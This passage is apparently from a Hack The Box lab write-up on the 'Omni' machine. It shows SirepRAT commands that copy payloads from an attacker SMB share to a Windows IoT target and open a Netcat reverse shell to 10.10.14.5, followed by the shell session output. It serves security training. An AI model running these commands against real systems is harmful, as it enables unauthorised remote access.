Exploit (SirepRat)
file download/upload/execution is possible through the exploit.
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/omni]
└─$ simplesmb . -smb2support
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsedStaring a SMB server on Kali, hosting the payload
Fail
┌──(kali㉿kali)-[~/…/htb/labs/omni/SirepRAT]
└─$ python3 sireprat.py $ip launchcommandwithoutput --return_output --cmd "c:\Windows\System32\cmd.exe" --args " /c copy \\\\10.10.14.5\\smb\\shell.exe C:\\shell.exe"
<hresultresult | type: 1, payload length: 4, HResult: 0x0>
<outputstreamresult | type: 11, payload length: 27, payload peek: 'b' 1 file(s) copied.\r\n''>
<errorstreamresult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>Executing the exploit script to deliver the payload to the target system over SMB
The --return_output flag displays the output of the entered command yet it’s slightly broken
┌──(kali㉿kali)-[~/…/htb/labs/omni/SirepRAT]
└─$ python3 sireprat.py $ip launchcommandwithoutput --return_output --cmd "c:\\shell.exe"
<hresultresult | type: 1, payload length: 4, HResult: 0x0>I tried executing the payload, but nothing shows up on the local Netcat listener It may be due to the AV or the fact that the filesystem might be different than regular Windows as this is likely a Windows IoT
Success
┌──(kali㉿kali)-[~/…/htb/labs/omni/SirepRAT]
└─$ python3 SirepRAT.py $IP LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy \\\\10.10.14.5\\smb\\nc64.exe C:\\nc64.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 27, payload peek: 'b' 1 file(s) copied.\r\n''>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>Trying again with a Netcat binary. It will be available at the system root directory
┌──(kali㉿kali)-[~/…/htb/labs/omni/SirepRAT]
└─$ python3 SirepRAT.py $IP LaunchCommandWithOutput --return_output --cmd "C:\\nc64.exe" --args " 10.10.14.5 9999 -e powershell.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>Executing a Netcat reverse shell command through the exploit script
┌──(kali㉿kali)-[~/archive/htb/labs/omni]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.204] 49672
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32> whoami
whoami : The term 'whoami' is not recognized as the name of a cmdlet,
function, script file, or operable program. Check the spelling of the name, or
if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ whoami
+ ~~~~~~
+ CategoryInfo : ObjectNotFound: (whoami:String) [], CommandNotFo
undException
+ FullyQualifiedErrorId : CommandNotFoundException
PS C:\windows\system32> cmd /c echo %username%
omni$
PS C:\windows\system32> hostname
omni
PS C:\windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::a8
IPv6 Address. . . . . . . . . . . : dead:beef::f178:17b1:199:4ce4
Temporary IPv6 Address. . . . . . : dead:beef::f443:5df:b248:953c
Link-local IPv6 Address . . . . . : fe80::f178:17b1:199:4ce4%4
IPv4 Address. . . . . . . . . . . : 10.10.10.204
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%4
10.10.10.2Initial Foothold established to the target system as the omni$ user.
Notice that the whoami.exe binary is not available. It’s definitely not a regular Windows system.
It would also appear that the current user is the machine account. Hence the trailing $ sign